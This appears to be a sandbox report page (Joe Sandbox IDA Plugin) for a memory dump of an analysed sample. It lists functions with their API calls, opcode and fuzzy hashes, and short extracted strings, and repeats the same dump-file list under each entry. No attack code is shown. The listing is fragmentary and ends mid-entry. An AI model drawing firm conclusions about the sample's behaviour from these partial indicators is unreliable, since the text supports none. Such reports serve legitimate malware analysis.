Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 774f0a8285b2566671fe33736e46f39d510e153ff5c5f128c5098fb4d83963d2
Instruction ID: 0daa24bf91cbcbbb058d69f7c6dc450ad43fee21d54a14ba12ebdc352361c554
Opcode Fuzzy Hash: 774f0a8285b2566671fe33736e46f39d510e153ff5c5f128c5098fb4d83963d2
Instruction Fuzzy Hash: C4E02232918210EBCB002B38BD16B1B7778EF87B24F0A0835F44193219DB35E800D5F6

Function 00D90879 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00D908C3

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 1d1b375b76d0db6ecdf2ecee7c491ae5ad36c8c9b86e26b047bf5df978f1c177
Instruction ID: 48287d9cf167f9c911be884a6ef6b975842d52f2a80465c68acd7634199b9944
Opcode Fuzzy Hash: 1d1b375b76d0db6ecdf2ecee7c491ae5ad36c8c9b86e26b047bf5df978f1c177
Instruction Fuzzy Hash: FE011475209702CFE710CF64D4D8B4BBBF1AB84304F14891CE4954B385D7B9A9498FD2

Function 00D8E343 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00D8E38C

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 5805eb90cec7eac66e71aa83c1f1706ac6e641b225f4301eb3aa9b0fe5c52649
Instruction ID: 1e067737df57028e4f5546050a76b86c85074473053b7c7d484b7df14d15b4fb
Opcode Fuzzy Hash: 5805eb90cec7eac66e71aa83c1f1706ac6e641b225f4301eb3aa9b0fe5c52649
Instruction Fuzzy Hash: 1A01F9B46097058FE305DF28D498B5ABBF1FB89304F14881CE495CB3A5C779A949CF81

Function 00D6CDF0 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 00D6CE04

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: d69d9b71ce94e6276accf8c7cf026e0b9fbb71dd029abfb3e40861f296158ee7
Instruction ID: b7d9cb510065dcc01adeca7d8a872bf41aa79bd7d163aae963bcf8df861f6b79
Opcode Fuzzy Hash: d69d9b71ce94e6276accf8c7cf026e0b9fbb71dd029abfb3e40861f296158ee7
Instruction Fuzzy Hash: A0D0A7212A0B4827D250A61DDD5BF37325C8703B68F0016266262C67C1D8506D21C575

Function 00D6CE23 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00D6CE35

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 48e7d15a67305f130cfece490ac57bf2017281aabe6d9fd86a0a1fc9351fe80d
Instruction ID: 78e110019e0cca2a23f2f340c49fd839f49c59ac67eae17b5f45624840f67bd7
Opcode Fuzzy Hash: 48e7d15a67305f130cfece490ac57bf2017281aabe6d9fd86a0a1fc9351fe80d
Instruction Fuzzy Hash: 0ED0C9313C43017AF5348A19AC53F2422054303F24F701619B322FE7D0C8D07111C529

Function 00D99B60 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,00000000,00D72F5C), ref: 00D99B80

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 982d11be15449b3cefc8ab063d6218be4bc4cb06d2c2191a883fec9ca2e286e7
Instruction ID: 495f23cfdc9753d27be9d9c5d9b9e1b4b1ed67697c6386089bbc6e7fc6a8c13c
Opcode Fuzzy Hash: 982d11be15449b3cefc8ab063d6218be4bc4cb06d2c2191a883fec9ca2e286e7
Instruction Fuzzy Hash: D2D0C935519226EBCA506F28BC15BC73B58DF49631F5B0891B400AA164C6A5EC918AE4

Function 00D99B40 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,00D74E57,00000400), ref: 00D99B50

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d12767fb99bd1770447ea263acf99414603724688acaa6d63081898ada6d8fe3
Instruction ID: 282b6f8b6b6887a1abddad17461ec911436c65cfc90dd016f5fcfc046213190d
Opcode Fuzzy Hash: d12767fb99bd1770447ea263acf99414603724688acaa6d63081898ada6d8fe3
Instruction Fuzzy Hash: C6C04835555224EACB10AB14EC09B8A3B68EF456A0F5A0492B005A61B58660AC828AA8

Function 00DB9790 Relevance: 1.3, APIs: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 00DB9E2D

Memory Dump Source

Source File: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 97c19a8cd4bf7d0719ae6968a71ed46c3973f8a34fe3910c51ddd18975bafb98
Instruction ID: 88dc4cc1a0da1aebe9ec1d89932b86f5aa77e87b3a4bea54389100a78033b363
Opcode Fuzzy Hash: 97c19a8cd4bf7d0719ae6968a71ed46c3973f8a34fe3910c51ddd18975bafb98
Instruction Fuzzy Hash: 02F0BEB1509209DBD308AF25C8996EFBBA0FF06310F01492EE9D742680D7729C10CF6B

Function 00DB9C85 Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 00DBA2C8

Memory Dump Source

Source File: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: de9011eefe5acd675c9b8498c6847c1e0f879a021b861882bb1efa086ec8ca21
Instruction ID: 7f93b1c5c80c96ff9f61d3f2adc11014222159014d1d6599030bde506ae046f4
Opcode Fuzzy Hash: de9011eefe5acd675c9b8498c6847c1e0f879a021b861882bb1efa086ec8ca21
Instruction Fuzzy Hash: 12C002B0048709DED7046F5994997BDFBE4FB06300F92492EA9D686644D7B24C90DA27

Non-executed Functions

Function 00D896D8 Relevance: 9.1, Strings: 7, Instructions: 340COMMON

Download Yara Rule

Strings

9nI9, xrefs: 00D899D6
cba`, xrefs: 00D8974C
;>*2, xrefs: 00D899CE
[93=, xrefs: 00D899E6
);?g, xrefs: 00D899EE
fa, xrefs: 00D899F6
='0{, xrefs: 00D899DE

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID:
String ID: );?g$9nI9$;>*2$='0{$[93=$cba`$fa
API String ID: 0-154584671
Opcode ID: d16a61f64407f2b86e6e50ec743d0a4b0421e777b627c3bce9652e19a6cc2058
Instruction ID: bebcc08d0539ccd972ee38ccbd765c5ea0c7bfe56b6ca1d0e3bfb984d3b772d8
Opcode Fuzzy Hash: d16a61f64407f2b86e6e50ec743d0a4b0421e777b627c3bce9652e19a6cc2058
Instruction Fuzzy Hash: CCC1E37550C3A08FC3159F29C8A067AFBE2AF96320F1C8A6CF4E557392C7758945CB62

Function 00D7C360 Relevance: 8.1, Strings: 6, Instructions: 626COMMON

Download Yara Rule

Strings

=z9|, xrefs: 00D7C917
}~, xrefs: 00D7C91F
CE, xrefs: 00D7C76D
JK, xrefs: 00D7C77D
GI, xrefs: 00D7C775
Vj)l, xrefs: 00D7C9D2

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID:
String ID: =z9|$JK$Vj)l$}~$CE$GI
API String ID: 0-2837980318
Opcode ID: 1c148971b71af4a52a8ac265a7bc552ae82210d4593fe1343c086bdc7887b842
Instruction ID: d4cd57e606a63691190ad5aea9330e0b3b2bc01b7ea6ae22f4487d2b496565d8
Opcode Fuzzy Hash: 1c148971b71af4a52a8ac265a7bc552ae82210d4593fe1343c086bdc7887b842
Instruction Fuzzy Hash: AF02EEB551C3408FC714DF29D89266BBBE2EFD5314F08982CE4CA8B351E7358A05CBA6

Function 00D8D085 Relevance: 6.6, Strings: 5, Instructions: 368COMMON

Download Yara Rule

Strings

#, xrefs: 00D8D4AC
k, xrefs: 00D8D4B6
0, xrefs: 00D8D430
P, xrefs: 00D8D554
AGsW, xrefs: 00D8D496

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID:
String ID: #$0$AGsW$P$k
API String ID: 0-1629916805
Opcode ID: 13396f321c0d92639e5cf9099edac41217a25e329f635cf98f7c055f4bf9d063
Instruction ID: 643358e3e809feec988a56a23a68810e1193d96ee344820252b1ffc6805c3168
Opcode Fuzzy Hash: 13396f321c0d92639e5cf9099edac41217a25e329f635cf98f7c055f4bf9d063
Instruction Fuzzy Hash: 61C1D4712493818ED328CF39C4517ABBBD2AFD3304F6C8A6DD4D58B2D1D6798409D726

Function 00D880B0 Relevance: 5.4, Strings: 4, Instructions: 440COMMON

Download Yara Rule

Strings

-., xrefs: 00D88576
12, xrefs: 00D883B8
i>}0, xrefs: 00D883AC
'|, xrefs: 00D88275

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID:
String ID: '|$-.$12$i>}0
API String ID: 0-2215797287
Opcode ID: cb7a5c3ca41a1a1361070580b67865b38e78fbab9bdecaaa774339daec6ffe18
Instruction ID: bff96141910bb154992d8a6f8190dfcad3b91da906eb199025eb1dd01d56c3f9
Opcode Fuzzy Hash: cb7a5c3ca41a1a1361070580b67865b38e78fbab9bdecaaa774339daec6ffe18
Instruction Fuzzy Hash: 55D1DD7220C3118FD718DF68D89179FB7E2EFC1314F19892DE4958B281EB74950ACBA2

Function 00E8A59C Relevance: 4.3, Strings: 3, Instructions: 559COMMON

Download Yara Rule

Strings

lsz, xrefs: 00E8AB97
lsz, xrefs: 00E8ABBB
o09d, xrefs: 00E8A59C

Memory Dump Source

Source File: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID:
String ID: lsz$lsz$o09d
API String ID: 0-1757948723
